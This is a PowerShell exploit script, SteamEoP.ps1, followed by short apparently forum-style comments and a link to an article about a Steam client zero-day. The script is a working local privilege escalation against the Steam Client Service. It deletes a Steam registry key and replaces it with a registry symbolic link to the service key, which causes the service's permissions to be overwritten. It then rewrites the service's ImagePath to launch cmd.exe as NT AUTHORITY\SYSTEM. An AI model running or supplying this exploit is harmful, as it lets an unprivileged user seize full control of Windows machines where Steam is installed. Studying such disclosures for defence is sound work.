SteamEoP.ps1

Write-Host "[*] Installing NTObjectManager..."
install-module NTObjectManager -Scope CurrentUser -Force
import-module NTObjectManager
Write-Host "[*] Removing HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
Remove-Item -Path "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
Write-Host "[*] Creating Registry Symbolic Link from HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS to HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service"
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Valve\Steam\NSIS",$null, "\REGISTRY\Machine\SYSTEM\CurrentControlSet\Services\Steam Client Service")
Write-Host "[*] Registry Symbolic link created, restarting the Steam Client Service"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Sleeping 5 seconds"
Start-Sleep 5
Write-Host "[*] DACL on HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service should be overwritten"
Write-Host "[*] Modifying the binPath on the Steam Client Service..."
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c cmd.exe"
Write-Host "[*] binPath overwritten, restarting the service to trigger EoP. This will error out, just ignore it"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Done, cmd.exe should now be running as NT AUTHORITY\SYSTEM"

Well done. It's amazing how the simplest things get overlooked. To find such an issue in the steam client of all things is impressive. Their dedication to security means this will be patched almost immediately.

Well done. It's amazing how the simplest things get overlooked. To find such an issue in the steam client of all things is impressive. Their dedication to security means this will be patched almost immediately.

😂😂😂
https://amonitoring.ru/article/steamclient-0day/